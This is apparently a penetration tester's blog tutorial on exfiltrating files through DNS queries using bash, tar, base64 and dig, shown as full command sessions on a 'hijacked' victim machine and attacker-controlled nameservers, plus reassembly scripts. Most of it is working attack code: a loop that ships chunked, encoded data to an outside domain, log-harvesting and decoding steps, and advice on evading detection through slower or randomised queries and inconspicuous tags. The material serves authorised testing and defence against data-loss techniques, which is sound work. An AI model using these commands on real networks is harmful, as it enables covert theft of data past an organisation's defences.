data exfiltration via DNS with standard OS tools

the background

[Note: I didn't invent this technique; this is simply meant as a PoC for the interested. —grimm]

As a sometimes-penetration-tester, one of the things I check is the ability to exfiltrate (i.e., ship to a location under my control) any data I've stolen. (Actually, to ship out some data I've faked to look like the stuff I would be stealing, as it would be irresponsible to have my employers'/clients' live data strewn about.) The point is to see if I can sneak it past whatever countermeasures {we,they}'ve deployed against such activity (commonly called "Data Loss Prevention" technologies).

There may be lots of ways to do this, depending upon the security posture of the target environment, but if you find yourself facing a paucity of options when it comes to outbound connectivity, one Internet-reaching service that almost all environments let their internal machines use is recursive DNS resolution. The nice thing about recursive DNS is that even if my adversaries (the target's defenders) have blocked "inside" machines from making DNS requests directly of "outside" servers, they'll typically allow access to their own DNS servers, and that's just as good. Mostly. (More on that later.)

Anyway, here's one way we can leverage DNS to our advantage using nothing more than bash and tools that are almost certainly installed on any Unix-like OS (and should be adaptable to Windows with a modest amount of cmd.exe-Fu or PowerShell):

the bullet list

- configure nameservers you control for query logging
- chunk data into (less-than-60-)byte-sized morsels
- come up with some way to keep them in the right order and check for missing chunks
- make DNS requests within a fake subdomain of your domain with the chunks prepended
- harvest the logged queries, reassemble into meaningful data
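The packaging steps in that list (chunk, number, prepend to a subdomain of your domain) can be sketched in bash as a dry run that only prints the query names, which are the same strings the full procedure echoes before handing each one to dig. This is a minimal sketch under assumptions. `make_queries` is a hypothetical helper name. It encodes a single file rather than a tar archive. It also flattens base64's output with `tr` and re-wraps it with `fold -w 50`, so the chunking does not depend on whether your base64 wraps lines with BSD's `-b` or GNU's `-w`.

```bash
#!/usr/bin/env bash
# make_queries (hypothetical helper): print, without sending anything, the DNS
# query names that would carry a file's contents, one per 50-character chunk
# of base64, in the form NNN-<chunk>.<tag>.<domain>.
make_queries() {
  local file=$1 tag=$2 domain=$3
  local count=0 chunk

  # Strip base64's own line wrapping (BSD controls it with -b, GNU with -w),
  # then re-wrap at exactly 50 columns with fold, so the chunks come out the
  # same on either platform.
  for chunk in $(base64 < "$file" | tr -d '\n' | fold -w 50); do
    # A 3-digit sequence number keeps the chunks orderable at the far end.
    printf '%03d-%s.%s.%s\n' "$count" "$chunk" "$tag" "$domain"
    count=$((count + 1))
  done
}
```

For example, `make_queries secret.txt BV5r4 our-domain.tld` prints one name per chunk, numbered from 000. Fifty base64 characters plus the four-character `NNN-` prefix make a 54-byte label, which stays under DNS's 63-byte limit per label.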

the full procedure

# DRAMATIS PERSONAE:
# victim0 is our hijacked machine on the inside (running Mac OS X, in this case)
# ns0.our-domain.tld and ns1.our-domain.tld, the authoritative nameservers for our-domain.tld, which we control (here,
# running BIND 9.x on Linux)
# secret-lair.our-domain.tld, where we'll reassemble and process the results

# NOTA BENE: in order for this to work as described herein, the receiving nameservers (ns0 and ns1) MUST
# implement query logging; this example presupposes BIND-9 style
# query logging, generating lines that look like this sample (if
# they don't, you'll need to adjust the parsing that awk does later):
# [update 20190806: it's possible to achieve results similar to BIND's query
# logging using, e.g., tcpdump/Wireshark/Bro/Zeek.]
[root@ns0 pentester]# grep query /var/log/messages | head -1
Jan 30 20:48:18 ns0 named[29085]: client 172.28.57.81#23406: view external: query: some-rr.our-domain.tld IN A -E

# BEGIN on victim0
# if we're feeling like it won't betray our position, we can send a
# little probe to make sure our DNS queries will make it all the way
# home:
[hijacked_account@victim0 dns_tx]$ dig +short www-Gb8RRyQ.our-domain.tld
[hijacked_account@victim0 dns_tx]$
# the fact that this returns nothing is inconsequential: all that
# matters is whether we can find it in our nameserver logs

# LOGIN to ns0 (and ns1 if necessary)
# yep, thar she blows:
[root@ns0 pentester]# grep www-Gb8RRyQ /var/log/messages
Jan 30 20:50:56 ns0 named[29085]: client 172.28.57.81#8844: view external: query: www-Gb8RRyQ.our-domain.tld IN A -E
# (note that you'll want to check ns1 if you don't find it on ns0)
# this is good, because now we know that our target environment's infrastructure
# will be our willing accomplice in shipping data outwards

# RETURN to victim0
# we'll be shipping two OpenOffice documents (a text doc and a spreadsheet)
# "back to base" for analysis/etc.; here they are:
[hijacked_account@victim0 dns_tx]$ file *
alphanumeric.ods: OpenDocument Spreadsheet
symphony.odt: OpenDocument Text
# hashing them as an integrity check:
[hijacked_account@victim0 dns_tx]$ openssl sha1 *
SHA1(alphanumeric.ods)= 6846777a88957d1336c8a04b23f88c2b3ba83c70
SHA1(symphony.odt)= a393449a180395bb7bdcc8b3e34f7cbcb5a42c84
# (note the prompt: for the transfer itself we've stepped up into
# dns_tx's parent directory, here called "test")
[hijacked_account@victim0 test]$ tag=BV5r4; count=0; for line in $(tar -czf - dns_tx | base64 -b 50); do q=`printf "%03d-%s.%s.our-domain.tld\n" $count $line $tag`; echo $q; dig +short $q 2>/dev/null; sleep 0.2; count=$[count+1]; done | tee dns_tx/dns_tx.log
000-H4sIAC106lIAA+16B1RUSbRtkyQnJUhSRHJscs4ZAckiOTXQAg.BV5r4.our-domain.tld
001-10N1lAkiAZoZWMIEkki+QgIEklCCg5g2SQnOGDjjPqw3nOWu/9.BV5r4.our-domain.tld
002-/996c1i3L133nF3nVnVVnVO1LSAwY5ArB+C/U4BAID8vL/WXO9.BV5r4.our-domain.tld
...
544-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld
545-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld
546-AAAAAAA=.BV5r4.our-domain.tld

# ok, that was a lot; let's break it down:
tag=BV5r4;
# setting $tag, a completely-arbitrary identifier you'll use later to
# yank all the logged queries pertaining to this transfer out of
# your logfiles at the receiving end; can be anything; you just need
# to be able to identify it later; also: might be best if it's not
# entirely obvious (e.g., "STOLEN-DATA"), just in case the target's
# DNS admins happen to be looking at their logs
count=0;
# initializing $count for use in properly-sequencing the segments for
# reassembly at the receiving end
for line in $(tar -czf - dns_tx | base64 -b 50);
# if you're new to bash, this might be a little much;
# let's break it down further, from the inside, out:
tar -czf - dns_tx
# our ill-gotten gains are in a directory called "dns_tx";
# we're one directory above that, using
# tar to (-c)reate an archive of that directory as a
# (-f)ile, gzip (-z) that archive, and spew it to
# STDOUT, at which point we'll...
| base64 -b 50
# ...pipe that to the STDIN of base64 which will
# (you guessed it) base64-encode that binary stream, and
# (-b)reak it into 50-character-wide lines (-b is the BSD/macOS
# spelling; GNU coreutils' base64 uses -w 50 instead)
# now, since that's all wrapped in "$( ... )", we're basically
# telling for to iterate over each of the resulting lines
# and do the following with each line:
do q=`printf "%03d-%s.%s.our-domain.tld\n" $count $line $tag`;
# first, set $q to a string formatted to look like a (mostly)
# legal DNS query:
# [3-digit $count]-[$line of base64-encoded stuff].[that $tag from earlier].our-domain.tld
# in this case, the first one looks like this (from above):
000-H4sIAC106lIAA+16B1RUSbRtkyQnJUhSRHJscs4ZAckiOTXQAg.BV5r4.our-domain.tld
echo $q;
# this just prints the query string for debugging purposes
# (so we have something for comparison, later; we'll talk about
# where this ends up in a moment)
dig +short $q 2>/dev/null;
# ah, finally, we get to make the DNS query; running dig with
# +short aims to minimize the output, all of which should be useless;
# same with the redirection of STDERR to /dev/null (2>/dev/null); each
# time this runs, we've transmitted one segment of our stolen data...somewhere...
sleep 0.2;
# wait for 0.2 seconds before processing the next line; THIS ONE
# MAY NOT BE PORTABLE: your sleep may only be capable of
# integer seconds; so be it: use sleep 1, and the pauses will just take
# five times as long; NOTE: if your target's security posture is rigid and mature,
# you may want to consider making this value quite large...or even
# randomizing it...your transfer will take longer, but you may stand
# a better chance of evading detection
count=$[count+1];
# increments our counter ($[ ] is an older, deprecated bash form;
# the POSIX equivalent is $((count+1)))
done
# closes the loop
| tee dns_tx/dns_tx.log
# and splits the output (remember echo $q way up above?)
# so that it shows up on the screen AND in a file in the dns_tx
# directory called dns_tx.log
# *whew* still with me? good. now...
# if our target environment's DNS servers were forwarding our requests
# to those nameservers we control AND we were logging, we should find
# our goodies in the query logs

# MOVE TO ns0.our-domain.tld and ns1.our-domain.tld
# first, let's get those messages out of each nameserver's logs
# and into a file:
[root@ns0 pentester]# grep '\.BV5r4\.' /var/log/messages > dns_tx_ns0.txt
[root@ns0 pentester]#
[root@ns1 pentester]# grep '\.BV5r4\.' /var/log/messages > dns_tx_ns1.txt
[root@ns1 pentester]#

# MOVE to secret-lair
# finally, we transfer those files to secret-lair, where we'll
# perform the reassembly (just for convenience's sake):
[pentester@secret-lair dns_rx]$ scp ns0:./dns_tx_ns0.txt .
...
[pentester@secret-lair dns_rx]$ scp ns1:./dns_tx_ns1.txt .
...
[pentester@secret-lair dns_rx]$ cat dns_tx_ns0.txt dns_tx_ns1.txt | awk '{print $(NF-3)}' | awk -F '-' '{print $1 " " $2}' | sort -k1,1n | uniq > dns_tx.txt
[pentester@secret-lair dns_rx]$
# ok, another complicated bash pipeline; here it is, step by step:
cat dns_tx_ns0.txt dns_tx_ns1.txt
# spit out the contents of both those files...
| awk '{print $(NF-3)}'
# ...and pipe the results to awk, which is set here
# to split the line at any whitespace and print the fourth field
# from the right ($NF == the rightmost field; $(NF-1) is the
# second field from the right, etc.)...
| awk -F '-' '{print $1 " " $2}'
# ...which we then pipe to another awk, but this time, its
# (-F)ield separator is the hyphen, and it will print the ($1)st field
# from the left, a space, then the ($2)nd field from the left
# (caveat: if your domain itself contains a hyphen, as the placeholder
# "our-domain.tld" does, $2 stops at that hyphen; harmless, since we
# only keep the part before the first period later); this, in turn...
| sort -k1,1n
# gets piped to sort which will, in this configuration,
# order the lines based upon (-k)ey field 1, (n)umerically; before...
| uniq
# ...we pipe it to uniq to weed out any duplicates...
> dns_tx.txt
# ...and redirect the output to a file called dns_tx.txt

# simplistic check: do we have the right number of lines? (see
# similar command run on victim0, waaaaay up at the top)
[pentester@secret-lair dns_rx]$ wc -l dns_tx.txt
547 dns_tx.txt
# a little more telling: do we have every "packet" in the sequence?
[pentester@secret-lair dns_rx]$ for i in $(seq 0 546); do str=`printf "%03d" $i`; ok=`egrep "^$str " dns_tx.txt`; if [ -z "$ok" ]; then echo "MISSING SEGMENT: $i"; fi; done
[pentester@secret-lair dns_rx]$
# decipherment of this one is left as an exercise for the reader;
# for comparison, here's what the output could look like if
# some segments *were* missing:
[pentester@secret-lair dns_rx]$ wc -l dns_tx.txt
543 dns_tx.txt
# (we wanted 547 lines, remember?)
[pentester@secret-lair dns_rx]$ for i in $(seq 0 546); do str=`printf "%03d" $i`; ok=`egrep "^$str " dns_tx.txt`; if [ -z "$ok" ]; then echo "MISSING SEGMENT: $i"; fi; done
MISSING SEGMENT: 41
MISSING SEGMENT: 295
MISSING SEGMENT: 367
MISSING SEGMENT: 537
[pentester@secret-lair dns_rx]$
# hrm...I'd recommend going back to victim0, SELECTING A NEW $tag, and retransmitting

# so, presuming our check output looked good (the first
# of the two for i in $(seq 0 546)... examples, above),
# we have a file whose contents look something like this:
[pentester@secret-lair dns_rx]$ cat dns_tx.txt
000 H4sIAC106lIAA+16B1RUSbRtkyQnJUhSRHJscs4ZAckiOTXQAg.BV5r4.our-domain.tld
001 10N1lAkiAZoZWMIEkki+QgIEklCCg5g2SQnOGDjjPqw3nOWu/9.BV5r4.our-domain.tld
002 /996c1i3L133nF3nVnVVnVO1LSAwY5ArB+C/U4BAID8vL/WXO9.BV5r4.our-domain.tld
...
544 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld
545 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.BV5r4.our-domain.tld
546 AAAAAAA=.BV5r4.our-domain.tld
# look sort of familiar?
# at this point, you can probably tell what we need to do next:
[pentester@secret-lair dns_rx]$ awk '{print $2}' dns_tx.txt | awk -F '.' '{print $1}' > dns_tx.b64
# ahem, OK, the breakdown (sorry; got excited for a moment, since
# we're almost done):
awk '{print $2}' dns_tx.txt
# use awk to split each line of dns_tx.txt on whitespace
# and return the ($2)nd field from the left...
| awk -F '.' '{print $1}'
# ...split *that* field (the DNS query we made from the victim0 machine)
# at the period and return the ($1)st field from the left (our base64-encoded
# goodies, right?), and...
> dns_tx.b64
# redirect all that into a file called dns_tx.b64 (as a mnemonic
# for the stage we're at; there's nothing magical about a ".b64" suffix)
# finally, we'll transform the base64 encoded data back into
# a binary stream (it was a gzipped tar archive, remember?)
# with GNU base64: (-d)ecode, and (-i)gnore any non-alphabet garbage...
[pentester@secret-lair dns_rx]$ base64 -di dns_tx.b64 > dns_tx.tgz
# see? see? they never see... --Calvin
[pentester@secret-lair dns_rx]$ file dns_tx.tgz
dns_tx.tgz: gzip compressed data, from Unix, last modified: Thu Jan 30 20:47:57 2014
# now we can expand and explore the archive:
[pentester@secret-lair dns_rx]$ tar -xzf dns_tx.tgz
[pentester@secret-lair dns_rx]$ cd dns_tx
# et voila; there they are (along with "dns_tx.log",
# which we can ignore):
[pentester@secret-lair dns_tx]$ file *
alphanumeric.ods: OpenDocument Spreadsheet
dns_tx.log: empty
symphony.odt: OpenDocument Text
[pentester@secret-lair dns_tx]$ openssl sha1 *
SHA1(alphanumeric.ods)= 6846777a88957d1336c8a04b23f88c2b3ba83c70
SHA1(dns_tx.log)= da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA1(symphony.odt)= a393449a180395bb7bdcc8b3e34f7cbcb5a42c84
# fin.
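The receiving-side steps above (pull the query name out of each log line, split off the sequence number, sort, de-duplicate, check for gaps, decode) can be rolled into a single bash function. This is a minimal sketch. It assumes BIND-style log lines like the samples above on stdin and GNU coreutils' base64 on the receiving machine. `reassemble` is a hypothetical helper name. Unlike the `awk -F '-'` step, it splits each query name at its first hyphen only, so a hyphenated domain does no harm. Its gap check cannot see segments missing from the very end of the transfer, so it's still worth comparing against the last sequence number victim0 printed.

```bash
#!/usr/bin/env bash
# reassemble (hypothetical helper): read BIND-style query-log lines on stdin,
# keep the queries carrying the transfer tag given as $1, and write the
# decoded bytes to stdout. If any sequence number between 0 and the highest
# one seen is missing, it lists the gaps on stderr and returns 1 instead.
# Assumes GNU coreutils base64 (for -d) on the receiving machine.
reassemble() {
  local tag=$1 chunks missing

  # $(NF-3) is the query name in lines like
  #   ... view external: query: 000-H4sI....BV5r4.our-domain.tld IN A -E
  # Split it at the FIRST hyphen only (the domain may contain hyphens too),
  # keep the label before the first period, and emit "seq payload".
  chunks=$(awk -v tag=".$tag." '
    NF >= 4 && index($(NF-3), tag) && index($(NF-3), "-") {
      q = $(NF-3)
      h = index(q, "-")
      split(substr(q, h + 1), labels, ".")
      print substr(q, 1, h - 1) + 0, labels[1]
    }' | sort -k1,1n | uniq)

  if [ -z "$chunks" ]; then
    echo "no segments tagged $tag found" >&2
    return 1
  fi

  # Walk the sorted sequence numbers and report any that were skipped.
  missing=$(printf '%s\n' "$chunks" | awk '
    BEGIN { n = 0 }
    {
      while (n < $1) { print "MISSING SEGMENT: " n; n++ }
      n = $1 + 1
    }')
  if [ -n "$missing" ]; then
    printf '%s\n' "$missing" >&2
    return 1
  fi

  # Concatenate the payloads in order and decode; GNU base64 -d ignores the
  # newlines between chunks, even though 50 is not a multiple of 4.
  printf '%s\n' "$chunks" | awk '{ print $2 }' | base64 -d
}
```

For example, `cat dns_tx_ns0.txt dns_tx_ns1.txt | reassemble BV5r4 > dns_tx.tgz` would stand in for the awk/sort/uniq, gap-check and base64 steps in one go.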

in conclusion...

So, there you have it. There are any number of variations you could make. For instance, if you wanted to encrypt the data (recommended, if you're going to be sassy enough to ship out the client's live goodies), you could insert some openssl goodness into the "packaging" and "reassembly" steps; you could rig up more transmission-time error checking (you could reinvent TCP!); or you might want shorter chunks of base64-encoded data to further evade detection. Possibilities abound.

If you're doing this stuff with the target's consent for purely ethical reasons and have questions, feel free to drop a line. I'm sure you can figure out how. ;-)

—grimm